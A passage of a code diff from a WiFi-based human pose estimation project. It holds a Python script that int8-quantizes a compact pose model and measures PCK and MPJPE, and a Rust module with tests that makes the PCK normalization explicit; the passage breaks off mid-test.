REPRODUCE (exact command run for ADR-175, run date 2026-06-15, on host ruvultra / RTX 5080):
ssh ruvultra 'cd ~/wiflow-std-bench && source venv/bin/activate && \
python ~/quantize_half_int8.py --mode both --qat-epochs 3 2>&1'
(the script lives in-repo at v2/crates/wifi-densepose-train/scripts/quantize_half_int8.py;
it was scp'd to ~/quantize_half_int8.py on ruvultra and invoked as above. It is read-only
to everything under ~/wiflow-std-bench except that it WRITES its int8 artifacts + a JSON
results file into ~/wiflow-std-bench/sweep/int8/ it never modifies half_best.pth or any
upstream file.)
Everything this script prints to stdout is MEASURED. Nothing is estimated.
"""
import argparse
import copy
import json
import os
import random
import sys
import time
import numpy as np
import torch
import torch.nn as nn
from torch.utils.data import DataLoader, Subset
BENCH = os.path.expanduser('~/wiflow-std-bench')
SWEEP = os.path.join(BENCH, 'sweep')
OUTDIR = os.path.join(SWEEP, 'int8')
sys.path.insert(0, os.path.join(BENCH, 'upstream'))
sys.path.insert(0, SWEEP)
from dataset import (PreprocessedCSIKeypointsDataset, # noqa: E402
create_preprocessed_train_val_test_loaders)
from losses.pose_loss import PoseLoss # noqa: E402
from utils.metrics import calculate_pck, calculate_mpjpe # noqa: E402 LOCKED metric (torso norm)
from model_compact import CompactWiFlowPoseModel, describe # noqa: E402
# half variant config — IDENTICAL to sweep/run_sweep.py VARIANTS[0] that produced half_best.pth
HALF = dict(tcn=[270, 220, 170, 120], conv=[4, 8, 16, 32], attn_groups=4,
groups_mode='gcd20', input_pw_groups=1)
HALF_CKPT = os.path.join(SWEEP, 'half_best.pth')
CORRUPT_FILE_START = 487 # files 487-499 were zero-filled by clean_nan.py (same as sweep)
SEED = 42
THRESHOLDS = (0.1, 0.2, 0.3, 0.4, 0.5) # PCK@10..50
def set_seed(seed=SEED):
random.seed(seed)
np.random.seed(seed)
torch.manual_seed(seed)
torch.cuda.manual_seed_all(seed)
torch.backends.cudnn.deterministic = True
torch.backends.cudnn.benchmark = False
def build_half(dropout=0.5):
return CompactWiFlowPoseModel(
tcn_channels=HALF['tcn'], conv_channels=HALF['conv'],
attn_groups=HALF['attn_groups'], groups_mode=HALF['groups_mode'],
input_pw_groups=HALF['input_pw_groups'], dropout=dropout)
@torch.no_grad()
def evaluate(model, loader, device):
"""MEASURED PCK@10..50 + MPJPE under the LOCKED torso-diameter normalization."""
model.eval()
totals = {t: 0.0 for t in THRESHOLDS}
total_mpe, n = 0.0, 0
for bx, by in loader:
bx, by = bx.to(device), by.to(device)
out = model(bx)
bs = by.size(0)
total_mpe += calculate_mpjpe(out, by) * bs
pck = calculate_pck(out, by, thresholds=list(totals)) # use_torso_norm=True default
for t in totals:
totals[t] += pck[t] * bs
n += bs
return {'samples': n, 'mpjpe': total_mpe / n,
**{f'pck@{int(t * 100)}': totals[t] / n for t in totals}}
def file_size_mb(path):
return os.path.getsize(path) / (1024 * 1024)
def state_dict_size_mb(model, path):
"""On-disk size of the *quantized* checkpoint (int8 weights are packed by fbgemm)."""
torch.save(model.state_dict(), path)
return file_size_mb(path)
def loaders():
set_seed(SEED)
data_dir = os.path.join(BENCH, 'preprocessed_csi_data')
dataset = PreprocessedCSIKeypointsDataset(data_dir=data_dir, keypoint_scale=1000.0,
enable_temporal_clean=True)
train_loader, val_loader, test_loader = create_preprocessed_train_val_test_loaders(
dataset=dataset, batch_size=64, num_workers=2, random_seed=SEED)
return dataset, train_loader, val_loader, test_loader
def clean_loader_from(dataset, test_loader, bs=256):
w2f = dataset.window_to_file
clean_idx = [i for i in test_loader.dataset.indices if w2f[i] < CORRUPT_FILE_START]
return DataLoader(Subset(dataset, clean_idx), batch_size=bs, shuffle=False, num_workers=2)
def eval_loaders(dataset, test_loader, bs=256):
full = DataLoader(test_loader.dataset, batch_size=bs, shuffle=False, num_workers=2)
clean = clean_loader_from(dataset, test_loader, bs=bs)
return full, clean
# --------------------------------------------------------------- int8 paths (FX graph mode)
def ptq_static(fp32_model, train_loader, calib_batches=64):
"""Static post-training quantization, FX graph mode, fbgemm. CPU int8."""
from torch.ao.quantization import get_default_qconfig, QConfigMapping
from torch.ao.quantization.quantize_fx import prepare_fx, convert_fx
torch.backends.quantized.engine = 'fbgemm'
m = copy.deepcopy(fp32_model).cpu().eval()
qconfig = get_default_qconfig('fbgemm')
qmap = QConfigMapping().set_global(qconfig)
example = torch.randn(1, 540, 20)
prepared = prepare_fx(m, qmap, example_inputs=(example,))
prepared.eval()
with torch.no_grad():
for i, (bx, _) in enumerate(train_loader):
prepared(bx.cpu())
if i + 1 >= calib_batches:
break
return convert_fx(prepared)
def qat(fp32_model, train_loader, val_loader, device, epochs=3, lr=2e-5):
"""Quantization-aware training, FX graph mode, fbgemm. Fine-tune fake-quant from fp32, convert. CPU int8."""
from torch.ao.quantization import get_default_qat_qconfig, QConfigMapping
from torch.ao.quantization.quantize_fx import prepare_qat_fx, convert_fx
torch.backends.quantized.engine = 'fbgemm'
set_seed(SEED)
m = copy.deepcopy(fp32_model).to(device).train()
qconfig = get_default_qat_qconfig('fbgemm')
qmap = QConfigMapping().set_global(qconfig)
example = torch.randn(1, 540, 20).to(device)
prepared = prepare_qat_fx(m, qmap, example_inputs=(example,))
prepared.to(device)
criterion = PoseLoss(position_weight=1.0, bone_weight=0.2, loss_type='smooth_l1')
opt = torch.optim.AdamW(prepared.parameters(), lr=lr, weight_decay=5e-5, betas=(0.9, 0.999))
best_val = float('inf')
best_state = None
for ep in range(1, epochs + 1):
prepared.train()
t0 = time.time()
ep_loss, nb = 0.0, 0
for bx, by in train_loader:
bx, by = bx.to(device), by.to(device)
opt.zero_grad(set_to_none=True)
out = prepared(bx)
loss, _ = criterion(out, by)
if not torch.isfinite(loss):
continue
loss.backward()
opt.step()
ep_loss += loss.item()
nb += 1
# eval the fake-quant model on GPU (proxy for int8) to pick the best epoch
prepared.eval()
v = evaluate(prepared, val_loader, device)
print(f"[qat] epoch {ep}/{epochs} train_loss={ep_loss / max(nb,1):.5f} "
f"val_mpjpe(fakequant)={v['mpjpe']:.5f} val_pck20={v['pck@20']*100:.2f}% "
f"({time.time()-t0:.0f}s)", flush=True)
if v['mpjpe'] < best_val:
best_val = v['mpjpe']
best_state = copy.deepcopy(prepared.state_dict())
if best_state is not None:
prepared.load_state_dict(best_state)
prepared.cpu().eval()
return convert_fx(prepared)
def main():
ap = argparse.ArgumentParser()
ap.add_argument('--mode', choices=['ptq', 'qat', 'both'], default='both')
ap.add_argument('--qat-epochs', type=int, default=3)
ap.add_argument('--calib-batches', type=int, default=64)
args = ap.parse_args()
os.makedirs(OUTDIR, exist_ok=True)
cuda = torch.device('cuda')
cpu = torch.device('cpu')
print(f"torch {torch.__version__} | cuda {torch.cuda.get_device_name(0)} | "
f"quantized.engine candidates {torch.backends.quantized.supported_engines}", flush=True)
dataset, train_loader, val_loader, test_loader = loaders()
test_full, test_clean = eval_loaders(dataset, test_loader)
# ---------- fp32 baseline (loads half_best.pth strict; same arch as sweep) ----------
fp32 = build_half().eval()
state = torch.load(HALF_CKPT, map_location='cpu', weights_only=True)
fp32.load_state_dict(state, strict=True)
fp32_size = file_size_mb(HALF_CKPT)
params = describe(fp32)['params']
print(f"\n=== fp32 baseline: half_best.pth | params={params:,} | "
f"on-disk={fp32_size:.3f} MB ===", flush=True)
results = {
'host': os.uname().nodename, 'gpu': torch.cuda.get_device_name(0),
'torch': torch.__version__, 'date_utc': time.strftime('%Y-%m-%dT%H:%M:%SZ', time.gmtime()),
'locked_normalization': 'torso-diameter (neck idx2 -> pelvis idx12), '
'upstream calculate_pck use_torso_norm=True (ADR-173 standard)',
'checkpoint': HALF_CKPT, 'params': params, 'fp32_size_mb': fp32_size,
'test_split': 'seed-42 file-level 70/15/15 test (full 54000 / clean 52560)',
'fp32': {}, 'int8': {},
}
fp32_gpu = build_half().to(cuda).eval()
fp32_gpu.load_state_dict(state, strict=True)
print('[fp32/gpu] full ...', flush=True)
results['fp32']['gpu_full'] = evaluate(fp32_gpu, test_full, cuda)
print(json.dumps(results['fp32']['gpu_full']), flush=True)
print('[fp32/gpu] clean ...', flush=True)
results['fp32']['gpu_clean'] = evaluate(fp32_gpu, test_clean, cuda)
print(json.dumps(results['fp32']['gpu_clean']), flush=True)
print('[fp32/cpu] full (device-matched ref for int8) ...', flush=True)
results['fp32']['cpu_full'] = evaluate(fp32.to(cpu), test_full, cpu)
print(json.dumps(results['fp32']['cpu_full']), flush=True)
print('[fp32/cpu] clean ...', flush=True)
results['fp32']['cpu_clean'] = evaluate(fp32.to(cpu), test_clean, cpu)
print(json.dumps(results['fp32']['cpu_clean']), flush=True)
# ---------- int8 ----------
def measure_int8(label, qmodel):
path = os.path.join(OUTDIR, f'half_int8_{label}.pth')
size = state_dict_size_mb(qmodel, path)
print(f"[int8/{label}] on-disk={size:.3f} MB | full ...", flush=True)
full = evaluate(qmodel, test_full, cpu)
print(json.dumps(full), flush=True)
print(f"[int8/{label}] clean ...", flush=True)
clean = evaluate(qmodel, test_clean, cpu)
print(json.dumps(clean), flush=True)
results['int8'][label] = {'size_mb': size, 'checkpoint': path,
'cpu_full': full, 'cpu_clean': clean}
if args.mode in ('ptq', 'both'):
print("\n=== int8 PTQ (static, FX, fbgemm) ===", flush=True)
qp = ptq_static(fp32.to(cpu).eval(), train_loader, calib_batches=args.calib_batches)
measure_int8('ptq_static', qp)
if args.mode in ('qat', 'both'):
print(f"\n=== int8 QAT (FX, fbgemm, {args.qat_epochs} epochs from half_best) ===", flush=True)
qq = qat(fp32, train_loader, val_loader, cuda, epochs=args.qat_epochs)
measure_int8('qat', qq)
out = os.path.join(OUTDIR, 'int8_results.json')
with open(out, 'w') as f:
json.dump(results, f, indent=2)
print('\nwrote', out, flush=True)
# ---------- comparison table (MEASURED) ----------
print("\n================= MEASURED COMPARISON (clean test subset, torso-PCK) =================", flush=True)
base = results['fp32']['cpu_clean']
print(f"{'model':16s} {'size_MB':>8s} {'pck@20':>8s} {'pck@50':>8s} {'mpjpe':>9s}", flush=True)
print(f"{'fp32 (cpu)':16s} {fp32_size:8.3f} {base['pck@20']*100:7.2f}% {base['pck@50']*100:7.2f}% {base['mpjpe']:9.6f}", flush=True)
for label, r in results['int8'].items():
c = r['cpu_clean']
d20 = (c['pck@20'] - base['pck@20']) * 100
d50 = (c['pck@50'] - base['pck@50']) * 100
print(f"{'int8 '+label:16s} {r['size_mb']:8.3f} {c['pck@20']*100:7.2f}% {c['pck@50']*100:7.2f}% {c['mpjpe']:9.6f} "
f"(d_pck20={d20:+.2f}pp d_pck50={d50:+.2f}pp size={fp32_size/r['size_mb']:.2f}x smaller)", flush=True)
if __name__ == '__main__':
main()
@@ -0,0 +1,708 @@
//! Metric-locked pose-accuracy harness (ADR-155 §Tier-1.2; needs ADR slot 173).
//!
//! # Why this module exists
//!
//! Three PCK\@20 numbers float around this project and **cannot be lined up**
//! because each silently uses a *different* PCK definition:
//!
//! | Number | Source | PCK normalization |
//! |--------|--------|-------------------|
//! | 96.09 % | WiFlow-STD reproduction | image / bounding-box normalized (looser) |
//! | 81.63 % | AetherArena MM-Fi (ADR-150) | torso-diameter (standard MM-Fi / GraphPose-Fi) |
//! | 61.1 % | GraphPose-Fi (preprint) | torso-diameter, 3D, mm-scale (harder) |
//!
//! The project was burned **twice** by metric ambiguity (a now-retracted "92.9 %
//! PCK\@20" used *absolute* pixel thresholds, not torso normalization). The fix
//! is to make the normalizer **explicit, selectable, and carried with every
//! reported number** so an unlabeled PCK figure is structurally impossible.
//!
//! [`metrics_core`](crate::metrics_core) already pins the *canonical*
//! torso-normalized PCK ([`pck_canonical`](crate::metrics_core::pck_canonical)).
//! This module generalizes it to a [`PckNormalization`] enum covering all three
//! conventions the SOTA brief names, adds [`mpjpe`] (mm), and bundles results
//! into a self-describing [`PoseAccuracy`] struct. It **reuses** the
//! `metrics_core` primitives (hip distance, bounding-box diagonal) — there is
//! still exactly one implementation of each geometric reference.
//!
//! # This is measurement infrastructure, not an accuracy claim
//!
//! Nothing here asserts any project model is good. The unit tests prove the
//! *harness* is arithmetically correct against hand-computed fixtures (no GPU,
//! no datasets), including the key demonstration that the **same predictions
//! score different PCK under the three normalizations** — proof the ambiguity is
//! real and the definitions are genuinely distinct.
//!
//! # Literature
//!
//! - Torso-diameter PCK is the MM-Fi / GraphPose-Fi convention (Yang et al.,
//! *GraphPose-Fi*, arXiv:2511.19105): a keypoint is correct iff its error is
//! within `k · d_torso`, with `d_torso` the hip↔hip (or shoulder↔hip) span.
//! - Bounding-box / image-normalized PCK is the WiFlow-STD-style looser
//! convention (arXiv:2602.08661) — normalize by the GT pose bbox diagonal.
//! - MPJPE (mean per-joint position error, mm) is reported by GraphPose-Fi and
//! Person-in-WiFi-3D (Yan et al., CVPR 2024).
use std::collections::BTreeMap;
use ndarray::{Array1, Array2};
use crate::metrics_core::{
bounding_box_diagonal, CANON_LEFT_HIP, CANON_RIGHT_HIP,
};
/// Visibility cutoff: a keypoint counts as *visible* iff `visibility[j] >= 0.5`
/// (COCO convention; matches [`crate::metrics_core`]).
const VISIBILITY_THRESHOLD: f32 = 0.5;
/// Minimum positive normalizer extent. Below this the reference scale is
/// considered degenerate (zero torso, collapsed bbox) and the frame is reported
/// unscoreable rather than dividing by ≈0.
const MIN_REFERENCE_EXTENT: f32 = 1e-6;
// ===========================================================================
// PCK normalization — the explicit, selectable definition
// ===========================================================================
/// The PCK normalization basis — **the single knob that made three project
/// numbers non-comparable**, now explicit and carried with every result.
///
/// A keypoint `j` (with `visibility[j] >= 0.5`) is *correct* iff
/// `‖pred_j gt_j‖₂ ≤ τ`, where the **distance tolerance `τ`** is derived from
/// the chosen normalization and the PCK threshold `k` (given as a percentage,
/// e.g. `20` for PCK\@20):
///
/// | Variant | `τ` (tolerance in coordinate units) |
/// |---------|--------------------------------------|
/// | [`TorsoDiameter`](Self::TorsoDiameter) | `(k/100) · d_torso` |
/// | [`BoundingBoxDiagonal`](Self::BoundingBoxDiagonal) | `(k/100) · d_bbox` |
/// | [`AbsolutePixels`](Self::AbsolutePixels) | `threshold` (k ignored) |
///
/// `d_torso` is the hip↔hip span (COCO joints 11↔12), falling back to the bbox
/// diagonal when both hips are not visible — identical to
/// [`crate::metrics_core::canonical_torso_size`]. `d_bbox` is the diagonal of
/// the axis-aligned bounding box of all visible GT keypoints.
///
/// These yield **different** PCK on the *same* predictions whenever
/// `d_torso ≠ d_bbox` (always true for a real pose: the bbox is larger than the
/// hip span), which is exactly why the 96 / 81.6 / 61 numbers cannot be lined
/// up without declaring this enum.
#[derive(Debug, Clone, Copy, PartialEq)]
pub enum PckNormalization {
/// **Torso-diameter** (hip↔hip span). The standard MM-Fi / GraphPose-Fi
/// convention and the *stricter* of the two relative normalizers. This is
/// the canonical default ([`crate::metrics_core::pck_canonical`]).
TorsoDiameter,
/// **Bounding-box diagonal** (a.k.a. image-normalized). The looser
/// WiFlow-STD-style convention: normalize by the GT pose bbox diagonal,
/// which is larger than the torso span ⇒ a more forgiving threshold ⇒ a
/// higher PCK on identical predictions.
BoundingBoxDiagonal,
/// **Absolute pixel/coordinate threshold** — no pose-relative
/// normalization. The PCK `k` percentage is ignored; the held `threshold`
/// is the raw distance tolerance directly. Included so historical
/// retracted-style numbers are reproducible, and **clearly labeled as
/// non-comparable** to the relative variants (it does not scale with body
/// size or camera distance).
AbsolutePixels(f32),
}
impl PckNormalization {
/// Human-readable, *self-documenting* label for a reported number — so a
/// `PoseAccuracy` printed anywhere always carries its definition.
pub fn label(&self) -> String {
match self {
PckNormalization::TorsoDiameter => "torso-diameter".to_string(),
PckNormalization::BoundingBoxDiagonal => "bbox-diagonal".to_string(),
PckNormalization::AbsolutePixels(t) => format!("absolute-px({t})"),
}
}
/// Compute the per-frame distance tolerance `τ` for PCK threshold `k`
/// (percentage). Returns `None` when the (relative) normalizer is degenerate
/// — the frame cannot be scored.
///
/// `gt_kpts` is `[n, 2]` (or `[n, ≥2]`, only x/y used); `visibility` is `[n]`.
fn tolerance(&self, gt_kpts: &Array2<f32>, visibility: &Array1<f32>, k: u8) -> Option<f32> {
let n = gt_kpts.shape()[0].min(visibility.len());
match self {
PckNormalization::AbsolutePixels(threshold) => {
// Raw tolerance, independent of pose scale and of `k`.
if *threshold > 0.0 {
Some(*threshold)
} else {
None
}
}
PckNormalization::TorsoDiameter => {
let d = torso_diameter(gt_kpts, visibility, n)?;
Some((k as f32 / 100.0) * d)
}
PckNormalization::BoundingBoxDiagonal => {
let d = bounding_box_diagonal(gt_kpts, visibility, n);
if d > MIN_REFERENCE_EXTENT {
Some((k as f32 / 100.0) * d)
} else {
None
}
}
}
}
}
/// Hip↔hip torso diameter with a bbox-diagonal fallback — the relative
/// normalizer shared by `TorsoDiameter` PCK and
/// [`crate::metrics_core::canonical_torso_size`]. Returns `None` when no
/// positive-extent reference exists.
fn torso_diameter(gt_kpts: &Array2<f32>, visibility: &Array1<f32>, n: usize) -> Option<f32> {
if CANON_LEFT_HIP < n
&& CANON_RIGHT_HIP < n
&& visibility[CANON_LEFT_HIP] >= VISIBILITY_THRESHOLD
&& visibility[CANON_RIGHT_HIP] >= VISIBILITY_THRESHOLD
{
let dx = gt_kpts[[CANON_LEFT_HIP, 0]] - gt_kpts[[CANON_RIGHT_HIP, 0]];
let dy = gt_kpts[[CANON_LEFT_HIP, 1]] - gt_kpts[[CANON_RIGHT_HIP, 1]];
let torso = (dx * dx + dy * dy).sqrt();
if torso > MIN_REFERENCE_EXTENT {
return Some(torso);
}
}
let diag = bounding_box_diagonal(gt_kpts, visibility, n);
if diag > MIN_REFERENCE_EXTENT {
Some(diag)
} else {
None
}
}
// ===========================================================================
// Single-frame PCK / MPJPE
// ===========================================================================
/// Per-frame **PCK\@`k`** under the selected `normalization`.
///
/// A keypoint `j` with `visibility[j] >= 0.5` is correct iff
/// `‖pred_j gt_j‖₂ ≤ τ`, with `τ` from
/// [`PckNormalization::tolerance`]. Only x/y are used (2D PCK is the standard
/// keypoint-PCK definition; pass 2-column arrays).
///
/// # Returns
/// `(correct, total, pck)` with `pck ∈ [0,1]`. **`(0, 0, 0.0)`** when no
/// keypoint is visible, or (for the relative normalizers) the reference scale is
/// degenerate — a frame with no measurable evidence scores 0, never 1.
/// NaN-valued coordinates make a keypoint *incorrect* (the `<=` comparison is
/// false for NaN) rather than panicking.
pub fn pck_at(
pred_kpts: &Array2<f32>,
gt_kpts: &Array2<f32>,
visibility: &Array1<f32>,
k: u8,
normalization: PckNormalization,
) -> (usize, usize, f32) {
let n = pred_kpts.shape()[0]
.min(gt_kpts.shape()[0])
.min(visibility.len());
let tol = match normalization.tolerance(gt_kpts, visibility, k) {
Some(t) => t,
None => return (0, 0, 0.0),
};
let mut correct = 0usize;
let mut total = 0usize;
for j in 0..n {
if visibility[j] < VISIBILITY_THRESHOLD {
continue;
}
total += 1;
let dx = pred_kpts[[j, 0]] - gt_kpts[[j, 0]];
let dy = pred_kpts[[j, 1]] - gt_kpts[[j, 1]];
let dist = (dx * dx + dy * dy).sqrt();
// NaN-safe: `NaN <= tol` is false, so a NaN coordinate counts as wrong.
if dist <= tol {
correct += 1;
}
}
let pck = if total > 0 {
correct as f32 / total as f32
} else {
0.0
};
(correct, total, pck)
}
/// Per-frame **MPJPE** (mean per-joint position error) over visible keypoints,
/// in the coordinate units of the inputs (report as mm when inputs are mm).
///
/// `pred`/`gt` are `[n, D]` with `D ∈ {2, 3}` (2D or 3D pose); all `D` columns
/// are used. Joints with `visibility[j] < 0.5` are excluded.
///
/// Returns `0.0` when no keypoint is visible (no evidence). A NaN coordinate
/// propagates into the returned mean (callers filter NaN frames upstream); it
/// does not panic.
pub fn mpjpe(pred: &Array2<f32>, gt: &Array2<f32>, visibility: &Array1<f32>) -> f32 {
let n = pred.shape()[0].min(gt.shape()[0]).min(visibility.len());
let d = pred.shape()[1].min(gt.shape()[1]);
let mut sum = 0.0f32;
let mut count = 0usize;
for j in 0..n {
if visibility[j] < VISIBILITY_THRESHOLD {
continue;
}
let mut sq = 0.0f32;
for c in 0..d {
let diff = pred[[j, c]] - gt[[j, c]];
sq += diff * diff;
}
sum += sq.sqrt();
count += 1;
}
if count > 0 {
sum / count as f32
} else {
0.0
}
}
// ===========================================================================
// Self-describing result struct + batch report
// ===========================================================================
/// A pose-accuracy result that **always carries the definition it was computed
/// under** — making an unlabeled PCK number structurally impossible.
///
/// Built by [`accuracy_report`] over a set of frames. `pck_at` maps each
/// requested threshold `k` (percentage, e.g. `20`) to its PCK in `[0,1]`. The
/// `normalization` field records *which* PCK definition produced those numbers,
/// so two `PoseAccuracy` values can only be compared when their `normalization`
/// matches (the comparability check the project lacked).
#[derive(Debug, Clone, PartialEq)]
pub struct PoseAccuracy {
/// PCK\@k for each requested threshold percentage `k`, in `[0,1]`.
pub pck_at: BTreeMap<u8, f32>,
/// Mean per-joint position error in coordinate units (mm for mm inputs).
pub mpjpe: f32,
/// The normalization basis under which `pck_at` was computed — the label a
/// reported number must always carry.
pub normalization: PckNormalization,
/// Number of keypoints per frame (the pose convention, e.g. 17 for COCO).
pub n_keypoints: usize,
/// Number of frames aggregated into this result.
pub n_frames: usize,
}
impl PoseAccuracy {
/// Convenience accessor for a single threshold, returning `None` when that
/// `k` was not requested.
pub fn pck(&self, k: u8) -> Option<f32> {
self.pck_at.get(&k).copied()
}
/// A one-line, self-documenting summary suitable for logs / RESULTS.md, e.g.
/// `PCK@20=0.750 (torso-diameter, 17kp, 1 frames) MPJPE=0.030`.
pub fn summary(&self) -> String {
let pcks: Vec<String> = self
.pck_at
.iter()
.map(|(k, v)| format!("PCK@{k}={v:.3}"))
.collect();
format!(
"{} ({}, {}kp, {} frames) MPJPE={:.4}",
pcks.join(" "),
self.normalization.label(),
self.n_keypoints,
self.n_frames,
self.mpjpe
)
}
}
/// One frame's prediction + ground truth + visibility for batch scoring.
///
/// All three arrays share row count `n_keypoints`; `pred`/`gt` are `[n, D]`
/// (`D ∈ {2,3}`), `visibility` is `[n]`.
#[derive(Debug, Clone)]
pub struct PoseFrame {
/// Predicted keypoints `[n, D]`.
pub pred: Array2<f32>,
/// Ground-truth keypoints `[n, D]`.
pub gt: Array2<f32>,
/// Per-keypoint visibility `[n]` (`>= 0.5` ⇒ visible).
pub visibility: Array1<f32>,
}
/// Aggregate [`PoseAccuracy`] over a batch of frames under **one** explicit
/// `normalization`, for the requested PCK thresholds `ks` (percentages).
///
/// PCK is micro-averaged over keypoints (sum of correct ÷ sum of visible across
/// all frames — the standard keypoint-PCK aggregation), so frames with more
/// visible joints contribute proportionally. MPJPE is micro-averaged over
/// visible joints likewise. Unscoreable frames (no visible joints, degenerate
/// relative normalizer) contribute `(0, 0)` and so are excluded from the
/// denominator rather than scored as perfect.
///
/// An **empty** `frames` slice yields all-zero PCK and `0.0` MPJPE — never a
/// panic or NaN.
pub fn accuracy_report(
frames: &[PoseFrame],
ks: &[u8],
normalization: PckNormalization,
) -> PoseAccuracy {
let n_keypoints = frames.first().map(|f| f.gt.shape()[0]).unwrap_or(0);
// PCK: per-threshold (correct, total) accumulators across frames.
let mut pck_acc: BTreeMap<u8, (usize, usize)> = ks.iter().map(|&k| (k, (0, 0))).collect();
// MPJPE: sum of per-joint distances and visible-joint count.
let mut mpjpe_sum = 0.0f32;
let mut mpjpe_count = 0usize;
for frame in frames {
for &k in ks {
let (c, t, _) = pck_at(&frame.pred, &frame.gt, &frame.visibility, k, normalization);
let entry = pck_acc.entry(k).or_insert((0, 0));
entry.0 += c;
entry.1 += t;
}
// Per-frame MPJPE re-derived as a (sum, count) contribution so the
// batch value is a true micro-average over joints.
let n = frame.pred.shape()[0].min(frame.gt.shape()[0]).min(frame.visibility.len());
let d = frame.pred.shape()[1].min(frame.gt.shape()[1]);
for j in 0..n {
if frame.visibility[j] < VISIBILITY_THRESHOLD {
continue;
}
let mut sq = 0.0f32;
for c in 0..d {
let diff = frame.pred[[j, c]] - frame.gt[[j, c]];
sq += diff * diff;
}
mpjpe_sum += sq.sqrt();
mpjpe_count += 1;
}
}
let pck_at: BTreeMap<u8, f32> = pck_acc
.into_iter()
.map(|(k, (c, t))| {
let v = if t > 0 { c as f32 / t as f32 } else { 0.0 };
(k, v)
})
.collect();
let mpjpe = if mpjpe_count > 0 {
mpjpe_sum / mpjpe_count as f32
} else {
0.0
};
PoseAccuracy {
pck_at,
mpjpe,
normalization,
n_keypoints,
n_frames: frames.len(),
}
}
#[cfg(test)]
mod tests {
use super::*;
/// Build a 17-joint `[17, 2]` pose from `(joint, x, y)` triples.
fn pose17(joints: &[(usize, f32, f32)]) -> Array2<f32> {
let mut a = Array2::<f32>::zeros((17, 2));
for &(j, x, y) in joints {
a[[j, 0]] = x;
a[[j, 1]] = y;
}
a
}
fn vis17(visible: &[usize]) -> Array1<f32> {
let mut v = Array1::<f32>::zeros(17);
for &j in visible {
v[j] = 2.0;
}
v
}
// -------- consts pinned (no silent metric drift) --------
#[test]
fn accuracy_consts_unchanged() {
assert_eq!(VISIBILITY_THRESHOLD, 0.5_f32);
assert_eq!(MIN_REFERENCE_EXTENT, 1e-6_f32);
}
// -------- perfect prediction ⇒ PCK = 1.0, MPJPE = 0 --------
#[test]
fn perfect_prediction_pck_one_mpjpe_zero() {
let gt = pose17(&[
(5, 0.35, 0.35),
(CANON_LEFT_HIP, 0.40, 0.50),
(CANON_RIGHT_HIP, 0.60, 0.50),
]);
let vis = vis17(&[5, CANON_LEFT_HIP, CANON_RIGHT_HIP]);
for norm in [
PckNormalization::TorsoDiameter,
PckNormalization::BoundingBoxDiagonal,
PckNormalization::AbsolutePixels(0.01),
] {
let (c, t, pck) = pck_at(&gt, &gt, &vis, 20, norm);
assert_eq!((c, t), (3, 3), "{norm:?}");
assert!((pck - 1.0).abs() < 1e-6, "{norm:?} perfect PCK must be 1.0");
}
assert_eq!(mpjpe(&gt, &gt, &vis), 0.0);
}
// -------- all keypoints just OUTSIDE threshold ⇒ PCK = 0.0 --------
//
// Hand calc (torso): hips at (0.40,0.50)/(0.60,0.50) ⇒ torso = 0.20.
// threshold k=20 ⇒ τ = 0.20·0.20 = 0.04. Push every scored joint to an
// error of 0.05 (> 0.04) ⇒ all wrong. To avoid the hips themselves being
// "correct", we displace the hips too (their displaced positions still
// define the torso from GT, which is unchanged).
#[test]
fn all_just_outside_threshold_pck_zero() {
let gt = pose17(&[
(5, 0.50, 0.50),
(CANON_LEFT_HIP, 0.40, 0.50),
(CANON_RIGHT_HIP, 0.60, 0.50),
]);
// GT torso = 0.20, τ@20 = 0.04. Displace each scored joint by dx=0.05.
let pred = pose17(&[
(5, 0.55, 0.50),
(CANON_LEFT_HIP, 0.45, 0.50),
(CANON_RIGHT_HIP, 0.65, 0.50),
]);
let vis = vis17(&[5, CANON_LEFT_HIP, CANON_RIGHT_HIP]);
let (c, t, pck) = pck_at(&pred, &gt, &vis, 20, PckNormalization::TorsoDiameter);
assert_eq!(t, 3);
assert_eq!(c, 0, "all errors 0.05 > τ 0.04 ⇒ none correct");
assert_eq!(pck, 0.0);
}
// -------- half-in / half-out ⇒ PCK = 0.5 --------
//
// Hand calc (torso): torso = 0.20, τ@20 = 0.04. Four visible joints; two
// exact (dist 0 ≤ 0.04, correct), two displaced 0.05 (> 0.04, wrong)
// ⇒ 2/4 = 0.5.
#[test]
fn half_in_half_out_pck_half() {
let gt = pose17(&[
(0, 0.50, 0.20),
(5, 0.50, 0.50),
(CANON_LEFT_HIP, 0.40, 0.50),
(CANON_RIGHT_HIP, 0.60, 0.50),
]);
let pred = pose17(&[
(0, 0.50, 0.20), // exact ⇒ correct
(5, 0.55, 0.50), // err 0.05 ⇒ wrong
(CANON_LEFT_HIP, 0.40, 0.50), // exact ⇒ correct
(CANON_RIGHT_HIP, 0.65, 0.50), // err 0.05 ⇒ wrong
]);
let vis = vis17(&[0, 5, CANON_LEFT_HIP, CANON_RIGHT_HIP]);
let (c, t, pck) = pck_at(&pred, &gt, &vis, 20, PckNormalization::TorsoDiameter);
assert_eq!((c, t), (2, 4));
assert!((pck - 0.5).abs() < 1e-6, "expected 0.5, got {pck}");
}
// -------- THE KEY PROOF: same predictions, three normalizations, three PCK --------
//
// One construction scored three ways. Hand calc:
// GT: nose(0)=(0.50,0.10), l_sh(5)=(0.50,0.30),
// l_hip(11)=(0.40,0.90), r_hip(12)=(0.60,0.90).
// Visible = {0,5,11,12}, all four.
// torso = |0.60-0.40| = 0.20 (hips, y equal).
// bbox: x∈[0.40,0.60] (w=0.20), y∈[0.10,0.90] (h=0.80)
// ⇒ diag = sqrt(0.20² + 0.80²) = sqrt(0.04+0.64)=sqrt(0.68)=0.8246…
//
// Pred errors (pure dx): nose 0.00, l_sh 0.10, l_hip 0.00, r_hip 0.00.
// (Only joint 5 is displaced, by 0.10.)
//
// k = 20:
// • Torso τ = 0.20·0.20 = 0.040 → joint5 err 0.10 > 0.040 ⇒ WRONG
// ⇒ 3 correct / 4 = 0.75
// • Bbox τ = 0.20·0.8246 = 0.16492 → joint5 err 0.10 ≤ 0.16492 ⇒ CORRECT
// ⇒ 4 correct / 4 = 1.00
// • Abs(0.05) τ = 0.05 → joint5 err 0.10 > 0.05 ⇒ WRONG
// ⇒ 3 correct / 4 = 0.75 (same count as torso HERE by coincidence)
//
// To make ALL THREE differ, also test Abs(0.08): τ=0.08, joint5 0.10>0.08
// ⇒ still 0.75. So we additionally displace nose by 0.06 (between 0.05 and
// 0.08) to separate the two absolute thresholds — see below.
#[test]
fn three_normalizations_give_different_pck_on_identical_input() {
let gt = pose17(&[
(0, 0.50, 0.10), // nose
(5, 0.50, 0.30), // left_shoulder
(CANON_LEFT_HIP, 0.40, 0.90),
(CANON_RIGHT_HIP, 0.60, 0.90),
]);
